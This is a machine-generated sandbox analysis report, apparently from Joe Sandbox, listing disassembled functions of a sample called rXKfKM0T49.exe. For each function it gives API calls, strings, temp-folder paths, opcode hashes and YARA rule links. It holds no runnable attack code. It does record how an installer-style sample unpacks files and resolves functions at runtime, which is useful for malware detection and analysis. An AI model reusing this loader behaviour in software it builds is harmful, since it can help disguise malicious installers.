                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            Function 0040667C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-3250253040
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(0001E270,00000064,0001E311), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            Function 7009161D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,700921EC,?,00000808), ref: 70091635
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,700921EC,?,00000808), ref: 7009163C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,700921EC,?,00000808), ref: 70091650
                                                                                                            • GetProcAddress.KERNEL32(!p,00000000), ref: 70091657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70091660
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID: !p
                                                                                                            • API String ID: 1148316912-2467817428
                                                                                                            • Opcode ID: c336faa0eb9174157cac95bf6f149daa4f13fbad6713519c00344bae21bfa333
                                                                                                            • Instruction ID: c05fac502b403bc556c4e336acb3a2462aefc3c2a2bfea3b9ac989a9b0749b23
                                                                                                            • Opcode Fuzzy Hash: c336faa0eb9174157cac95bf6f149daa4f13fbad6713519c00344bae21bfa333
                                                                                                            • Instruction Fuzzy Hash: 50F09E7311A1387F962116A78C4CD9B7E9CEF8B2F5B110216F728A11A085A15D01D7F1
                                                                                                            Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            Function 70092569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 7009121B: GlobalAlloc.KERNEL32(00000040,?,7009123B,?,700912DF,00000019,700911BE,-000000A0), ref: 70091225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70092657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 7009268C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 5e4fb459ac49a9313bf519d321793ca390f62ff4ba72b5b2a29739e38e06c971
                                                                                                            • Instruction ID: 62f66e45a8a62ca6c5db8efcbe496d3d784698f30e1c6efa9e3cabbaa3737027
                                                                                                            • Opcode Fuzzy Hash: 5e4fb459ac49a9313bf519d321793ca390f62ff4ba72b5b2a29739e38e06c971
                                                                                                            • Instruction Fuzzy Hash: 3D31F032224101DFD7269F65CC94D2E77BAFB85B34322012AF24293670C731A814EB59
                                                                                                            Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nspC239.tmp$C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll
                                                                                                            • API String ID: 3109718747-1808417934
                                                                                                            • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                            • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                            Function 700918D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
